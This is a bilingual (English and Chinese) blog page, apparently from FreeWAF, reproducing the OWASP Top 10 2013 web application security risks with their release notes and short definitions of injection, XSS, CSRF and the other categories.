OWASP Top 10 – 2013 最新的十大安全隐患 » FreeWAF




OWASP Top 10 – 2013 最新的十大安全隐患

OWASP Top 10 – 2013 最新的十大安全隐患

OWASP(开放Web软件安全项目- Open Web Application Security Project)是一个开放社群、非营利性组织,目前全球有130个分会近万名会员,其主要目标是研议协助解决Web软体安全标准、工具与技术,长期致力于协助政府或企业了解并改善Web应用与服务的安全性。

一.发布备注(Release Notes)


The threat landscape for applications security constantly changes. Key factors in this evolution are advances made by attackers, the release of new technologies with new weaknesses as well as more built in defenses, and the deployment of increasingly complex systems. To keep pace, we periodically update the OWASP Top 10. In this 2013 release, we made the following changes:


1) Broken Authentication and Session Management moved up in prevalence based on our data set. We believe this is probably because this area is being looked at harder, not because these issues are actually more prevalent. This caused Risks A2 and A3 to switch places.


2) Cross-Site Request Forgery (CSRF) moved down in prevalence based on our data set from 2010-A5 to 2013-A8. We believe this is because CSRF has been in the OWASP Top 10 for 6 years, and organizations and framework developers have focused on it enough to significantly reduce the number of CSRF vulnerabilities in real world applications.


3) We broadened Failure to Restrict URL Access from the 2010 OWASP Top 10 to be more inclusive:

+2010-A8: Failure to Restrict URL Access is now 2013-A7: Missing Function Level Access Control – to cover all of function level access control. There are many ways to specify which function is being accessed, not just the URL.


4) We merged and broadened 2010-A7 & 2010-A9 to CREATE: 2013-A6: Sensitive Data Exposure:

–This new category was created by merging 2010-A7 – Insecure Cryptographic Storage & 2010-A9 – Insufficient Transport Layer Protection, plus adding browser side sensitive data risks as well. This new category covers sensitive data protection (other than access control which is covered by 2013-A4 and 2013-A7) from the moment sensitive data is provided by the user, sent to and stored within the application, and then sent back to the browser again.


5) We added: 2013-A9: Using Known Vulnerable Components:

+This issue was mentioned as part of 2010-A6 – Security Misconfiguration, but now has a category of its own as the growth and depth of component based development has significantly increased the risk of using known vulnerable components.







Attackers can potentially use many different paths through your application to do harm to your business or organization. Each of these paths represents a risk that may, or may not, be serious enough to warrant attention..


Sometimes, these paths are trivial to find and exploit and sometimes they are extremely difficult. Similarly, the harm that is caused may be of no consequence, or it may put you out of business. To determine the risk to your organization, you can evaluate the likelihood associated with each threat agent, attack vector, and security weakness and combine it with an estimate of the technical and business impact to your organization. Together, these factors determine the overall risk.


三. 安全风险Top10

A1 – Injection

Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

(A1 – 注入,注入缺陷,例如SQL注入、OS命令注入、LDAP注入等,会在攻击者向应用服务端发送以分隔符作为命令或者查询的一部分时就会发生。攻击者的有害数据中分隔符造成的陷阱,会执行攻击构造的未预知的命令或者访问未授权数据。)

A2 – Broken Authentication and Session Management

Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.

(A2 -失效的身份认证和会话管理,与身份认证和会话管理相关的应用功能经常实现的不正确,允许攻击者可以构造密码、密钥、或者会话令牌或者利用实现缺陷,假冒其他用户的身份。)

A3 – Cross-Site Scripting (XSS)

XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

(A3 – XSS,当应用服务接收不被信任的数据,并且将该数据不经过验证或者字符过滤,就发送给客户的Web浏览器,就会产生XSS攻击。XSS攻击允许攻击者在受害者的浏览器中执行脚本,用于劫持受害者用户的会话信息,伤害特定的网站,或者重定向用户到恶意站点。)

A4 – Insecure Direct Object References

A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.

(A4 – 不安全的直接对象引用,应用开发者有时候可能会暴露应用内部实现对象的引用,例如文件、目录、或者数据库Key等。如果没有对这些的访问控制或者其他保护,攻击者就有可能利用这些暴露的引用访问未授权的数据。)

A5 – Security Misconfiguration

Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.

(A5 – 安全配置错误,应用、框架、Web服务器、数据库服务器、各种应用平台的良好的安全性需要一份定义好的、部署好的安全配置。安全配置必需进行良好的定义、实现、维护,默认配置通常情况下是不安全的,另外,软件应该及时更新。)

A6 – Sensitive Data Exposure

Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.

(A6 – 敏感数据泄露,许多Web应用没有正确地保护敏感数据,例如信用卡卡号、税号、身份认证证书等。攻击者可以通过偷窃、更改这种弱保护的数据,以进行信用卡诈骗、身份窃取、或者其他犯罪。这类敏感数据值得进行额外的保护,例如,加密传输、在于客户端浏览器交换数据时进行的特殊保护。)

A7 – Missing Function Level Access Control

Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization.

(A7 – 功能级访问控制缺失,大部分Web应用在界面上进行了应用级访问控制,但是应用服务器端也要进行响应的访问控制才行。如果请求没有验证,攻击者就能够构造请求访问未授权的功能。)

A8 – Cross-Site Request Forgery (CSRF)

A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.

(A8 – 跨站请求伪造,CSRF攻击强制一个已经登入的受害者浏览器,向带漏洞的Web应用发送伪造的HTTP请求,但是使用的是受害者正确的会话Cookie,以及其他的认证信息,这样攻击者就可以让Web应用认为这是受害者自愿发送的请求。)

A9 – Using Components with Known Vulnerabilities

Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts.

(A9 –使用已知易受攻击组件,组件,比如库、框架、或者其他的软件模块,通常运行在最高权限。如果一个有弱点的组件受到了利用,就可能被攻击者控制服务器或者造成严重数据损失。使用已知易受攻击组件的应用会造成应用整体安全性的降低,并且造成一定范围的攻击和影响。)

A10 – Unvalidated Redirects and Forwards

Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

(A10 –未验证的重定向和转发,Web应用经常会将用户重定向到其他的页面或者站点,并且使用使用不可信的数据来确定目标页面,如果不进行正确的验证,攻击可以让受害者重定向到钓鱼或者挂马的网站,或者利用重定向访问未授权页面。)




Concurrency Flaws

Denial of Service (Was 2004 Top 10 – Entry 2004-A9)

Expression Language Injection (CWE-917)

Information Leakage and Improper Error Handling (Was part of 2007 Top 10 – Entry 2007-A6)

Insufficient Anti-automation (CWE-799)

Insufficient Logging and Accountability (Related to 2007 Top 10 – Entry 2007-A6)

Lack of Intrusion Detection and Response

Malicious File Execution (Was 2007 Top 10 – Entry 2007-A3)

Mass Assignment (CWE-915)

User Privacy。



电子邮件地址不会被公开。 必填项已用 * 标注

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>